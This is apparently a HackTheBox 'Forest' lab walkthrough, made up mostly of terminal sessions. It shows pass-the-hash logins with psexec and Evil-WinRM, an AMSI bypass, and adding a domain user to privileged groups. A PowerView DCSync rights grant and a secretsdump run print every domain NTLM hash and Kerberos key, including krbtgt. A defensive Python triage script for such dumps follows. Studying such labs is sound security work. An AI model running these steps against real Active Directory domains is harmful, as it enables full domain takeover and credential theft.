root@kalivm:~/Forest# psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 powershell.exe
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file ezaVoayr.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service CAke on 10.10.10.161.....
[*] Starting service CAke.....
[!] Press help for extra shell commands
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
type c:\Users\Administrator\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
The same escalation, redone later from an evil-winrm session with PowerView instead of ntlmrelayx. First a new domain user, added to 'Exchange Windows Permissions' and to 'Remote Management Users' so that it can use WinRM itself:
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user puck abc123! /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "Exchange Windows Permissions" puck /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net localgroup "Remote Management Users" puck /add
The command completed successfully.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> upload PowerView.ps1
Info: Uploading PowerView.ps1 to C:\Users\svc-alfresco\Documents\PowerView.ps1
Data: 1027036 bytes of 1027036 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> menu
---snip--- (Evil-WinRM banner and the list of loaded functions: the PowerView cmdlets, among them Add-DomainObjectAcl, Add-DomainGroupMember and New-DomainUser, plus Evil-WinRM's own Bypass-4MSI, Invoke-Binary, services, upload, download, menu and exit)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Bypass-4MSI
Info: Patching 4MSI, please be patient...
[+] Success!
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'abc123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\puck', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-ObjectACL -PrincipalIdentity puck -Credential $cred -Rights DCSync
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Add-ObjectACL is PowerView's older alias for Add-DomainObjectAcl. -Rights DCSync writes ACEs for the three replication extended rights (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All and DS-Replication-Get-Changes-In-Filtered-Set) for puck, authenticating as puck itself, whose membership in Exchange Windows Permissions supplies the WriteDACL that makes the write succeed. No -TargetIdentity is given here; adding -TargetIdentity 'DC=htb,DC=local' restricts the ACE writes to the domain object, the only place where the replication rights have any effect.
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $python3 secretsdump.py htb/puck@10.10.10.161
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:abc123!
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
puck:9601:aad3b435b51404eeaad3b435b51404ee:44f077e27f6fef69e7bd834c7242b040:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
puck:aes256-cts-hmac-sha1-96:06e262b4631831eb9e36337f221a12ef9002d822111e2cf0b6986677b43de401
puck:aes128-cts-hmac-sha1-96:b36d7c9f29063935479a113ac05ce4f7
puck:des-cbc-md5:d97915c119025dd9
FOREST$:aes256-cts-hmac-sha1-96:667d61b318e1302ef1861f3dfe5f89ef1d737f7f277da9841f64dc6b49de811b
FOREST$:aes128-cts-hmac-sha1-96:2376f9c19c4bb9a61f7008ecb735af41
FOREST$:des-cbc-md5:15bffbfb9dcb2c51
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...
┌─[puck@parrot-lt]─[~/htb/forrest]
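With the dump in hand, here is an added example of the first-pass triage I would run over it (my own code, not impacket's): it parses the domain\user:rid:lmhash:nthash::: lines, skips the Kerberos-key lines, and reports blank NT hashes, accounts that still store an LM hash, NT-hash reuse (NT hashes are unsalted, so equal hashes mean equal passwords) and machine accounts. The sample is a few lines copied from the dump above plus two constructed accounts (helpdesk-test and legacy-svc, with made-up hashes) to exercise the reuse and LM checks; the format carries no enabled/disabled flag (secretsdump adds one only with -user-status), so blank-hash hits need that check before being reported.

```python
# Added example, not from the write-up: triage of a secretsdump / DCSync dump.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # MD4 of the empty UTF-16LE string

# domain\user:rid:lmhash:nthash:::  (the domain prefix is optional in the output)
HASH_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)


def parse_dump(text):
    """Return one dict per hash line; [*] chatter and Kerberos-key lines are skipped."""
    records = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            rec = m.groupdict()
            rec["rid"] = int(rec["rid"])
            rec["lm"], rec["nt"] = rec["lm"].lower(), rec["nt"].lower()
            records.append(rec)
    return records


def triage(records):
    """Findings a reviewer wants before anything else is done with the dump."""
    by_nt = defaultdict(list)
    for r in records:
        by_nt[r["nt"]].append(r["user"])
    return {
        # blank NT hash: usually disabled built-ins, but verify with -user-status
        "blank_password": sorted(by_nt.get(EMPTY_NT, [])),
        # an LM hash means the password is crackable in two 7-char halves
        "lm_hash_stored": sorted(r["user"] for r in records if r["lm"] != EMPTY_LM),
        # identical NT hashes are identical passwords (no salt)
        "shared_password": sorted(sorted(users) for nt, users in by_nt.items()
                                 if nt != EMPTY_NT and len(users) > 1),
        "machine_accounts": sorted(r["user"] for r in records if r["user"].endswith("$")),
        # krbtgt NT hash = golden-ticket material; rotate it twice after an incident
        "krbtgt_dumped": any(r["user"] == "krbtgt" for r in records),
    }


# Lines copied from the dump above, plus two constructed accounts (hashes made up).
SAMPLE_DUMP = r"""
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:80999de0dddffb9be58424af7aa12696:::
htb.local\helpdesk-test:9700:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\legacy-svc:9701:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
[*] Kerberos keys grabbed
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
"""

if __name__ == "__main__":
    for finding, value in triage(parse_dump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```

On the real dump above the blank-hash list is Guest, DefaultAccount, $331000-VK4ADACQNUCA and the SM_ accounts, all of which Exchange and Windows create disabled; the point of the check is the account that shows up there and is not disabled.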
┌─[puck@parrot-lt]─[~/htb/forrest]
└──╼ $evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Author: Puckiestyle